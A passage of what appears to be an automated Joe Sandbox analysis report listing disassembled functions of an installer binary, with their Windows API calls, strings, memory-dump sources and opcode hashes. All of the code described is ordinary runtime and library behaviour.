                                                                                                        • Opcode ID: 438c2ddc31253b572c9e46b510874cb132fb40a842e48f600c0f00a57bb0707d
                                                                                                        • Instruction ID: 2e4fee74b83a7731d4a58fa6522d18562d94b1070c9043de7affe113e96d0330
                                                                                                        • Opcode Fuzzy Hash: 438c2ddc31253b572c9e46b510874cb132fb40a842e48f600c0f00a57bb0707d
                                                                                                        • Instruction Fuzzy Hash: 32016171900509CFCB109B69DC0867DBB75EF84335B258365D826F32A0EB309D56DB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00CA0EF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException,?,?,?,?,00E99680,000000FF), ref: 00CA0F32
                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00CA0F38
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: RoOriginateLanguageException$combase.dll
                                                                                                        • API String ID: 2574300362-3996158991
                                                                                                        • Opcode ID: f2966f73d1b952a3a82509fdaf094798f5dff477676a5314d421c54828ab572a
                                                                                                        • Instruction ID: 0f866ac8833616f8d834241c02a5f8980867b8cfe1c154956e71239d03156048
                                                                                                        • Opcode Fuzzy Hash: f2966f73d1b952a3a82509fdaf094798f5dff477676a5314d421c54828ab572a
                                                                                                        • Instruction Fuzzy Hash: F9316B7190420ADFDF20DFA8C845BEEBBF4AB15754F20062AE424B32D1DBB55A44DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E6DB49 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00E6DB50
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00E6DB5B
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00E6DBC9
                                                                                                          • Part of subcall function 00E6DCAB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E6DCC3
                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00E6DB76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 677527491-0
                                                                                                        • Opcode ID: b50f1637f170abc3bb1f8c0cdbb46dba03cc26fd588c5fbcf8a32b0105b30384
                                                                                                        • Instruction ID: 298b29e59af80866d93b31ce2eabe7d619def1944d03b14c369660e878dc3183
                                                                                                        • Opcode Fuzzy Hash: b50f1637f170abc3bb1f8c0cdbb46dba03cc26fd588c5fbcf8a32b0105b30384
                                                                                                        • Instruction Fuzzy Hash: CC019A71A001188FD70AEB60ED459BC7BA5EF85380B685019E801B7391CF746A06CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00E702E8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,00E70285,00000064), ref: 00E7030B
                                                                                                        • LeaveCriticalSection.KERNEL32(00F8FF6C,?,?,00E70285,00000064,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF), ref: 00E70315
                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00E70285,00000064,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF), ref: 00E70326
                                                                                                        • EnterCriticalSection.KERNEL32(00F8FF6C,?,00E70285,00000064,?,?,?,00C9AD96,00F90B9C,CA4F4AE5,?,?,00E983BD,000000FF,?,00C91177), ref: 00E7032D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 3269011525-0
                                                                                                        • Opcode ID: b9d18a4c8d0d6ebece4e6da639ae58a1e4bfa2088680e6edbaa712f83681560a
                                                                                                        • Instruction ID: db70ecc4e3940331a3071742aa41fb0e3b795a1d7d3226e99c16ca22708c20b7
                                                                                                        • Opcode Fuzzy Hash: b9d18a4c8d0d6ebece4e6da639ae58a1e4bfa2088680e6edbaa712f83681560a
                                                                                                        • Instruction Fuzzy Hash: 41E09231641528FFC6013B91FD08AED3F2CDF4AB51B304220F609B21708F654859EBC1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DB6150 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 330COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00DB6381
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_exception_copy
                                                                                                        • String ID: ios_base::failbit set$iostream
                                                                                                        • API String ID: 2659868963-302468714
                                                                                                        • Opcode ID: efc54607bf4e41f628cb4c8ce85307f05e83ea8a75672eef8744922c6790b4f6
                                                                                                        • Instruction ID: 708e3db69eb658402895e7b5ce1705f21a614ac8bd515c42cbf7e86f0ea4ed74
                                                                                                        • Opcode Fuzzy Hash: efc54607bf4e41f628cb4c8ce85307f05e83ea8a75672eef8744922c6790b4f6
                                                                                                        • Instruction Fuzzy Hash: 9ED18F71D00248DFDB14DFA8C845BEEFBB5EF49314F248269E816AB381D7749A44CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DEFCA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00C9ACF0: GetProcessHeap.KERNEL32 ref: 00C9AD45
                                                                                                          • Part of subcall function 00C9ACF0: __Init_thread_footer.LIBCMT ref: 00C9AD77
                                                                                                          • Part of subcall function 00C9ACF0: __Init_thread_footer.LIBCMT ref: 00C9AE02
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00EDF97F,000000FF), ref: 00DEFE23
                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00EDF97F,000000FF), ref: 00DEFEB1
                                                                                                        Strings
                                                                                                        • << Advanced Installer (x86) Log >>, xrefs: 00DEFD8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                        • String ID: << Advanced Installer (x86) Log >>
                                                                                                        • API String ID: 3699736680-396061572
                                                                                                        • Opcode ID: 56e16739dd3848b32593b01777bb9b44ad3f6d1143e62ed611d55ab5938bb28f
                                                                                                        • Instruction ID: 79b95ad45d89430db44c446801a02761c73830418720649ae0919767ab1ffa14
                                                                                                        • Opcode Fuzzy Hash: 56e16739dd3848b32593b01777bb9b44ad3f6d1143e62ed611d55ab5938bb28f
                                                                                                        • Instruction Fuzzy Hash: A961F17090168ADFDB01DF69C94879EBBF4FF45314F1882ADE8009B792DB74AA04DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DAD230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PathIsUNCW.SHLWAPI(?,CA4F4AE5), ref: 00DAD2D1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path
                                                                                                        • String ID: \\?\$\\?\UNC\
                                                                                                        • API String ID: 2875597873-3019864461
                                                                                                        • Opcode ID: e0708258e0c32e59839426ccf58289c1031b5167e1399869494a874930453b2f
                                                                                                        • Instruction ID: 497e8fa8176b1eb9e7f8f51ee78b31671b3ef87b85bc74126b967fce5957b9a9
                                                                                                        • Opcode Fuzzy Hash: e0708258e0c32e59839426ccf58289c1031b5167e1399869494a874930453b2f
                                                                                                        • Instruction Fuzzy Hash: 4B51C370D102049BDB14DF68C889BAEB7F5FF95304F10861DE84267681EBB5A948CBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00DC4380 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,CA4F4AE5,00F1F010), ref: 00DC43EC
                                                                                                        • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00DC44E3
                                                                                                          • Part of subcall function 00DB0520: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00DB05F5
                                                                                                        Strings
                                                                                                        • Failed to get Windows error message [win32 error 0x, xrefs: 00DC440A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.307606207.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.307593757.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307708369.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307735071.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307745264.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307758263.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.307769707.0000000000F9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_c90000_bb.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
                                                                                                        • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                        • API String ID: 201254970-3373098694
                                                                                                        • Opcode ID: 5913da8578408cc279823ea1097e4c2b3dc813a2ce971b1bf5930be1eaf312e2
                                                                                                        • Instruction ID: 503f83097732f2b8d57f950e0ff13753807af2a423dabe8d3762442ba071cb20
                                                                                                        • Opcode Fuzzy Hash: 5913da8578408cc279823ea1097e4c2b3dc813a2ce971b1bf5930be1eaf312e2
                                                                                                        • Instruction Fuzzy Hash: BC41C371A043099BDB10DF68C959BAEBBF8EF44710F208559E405A72D1DBB49A48CBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%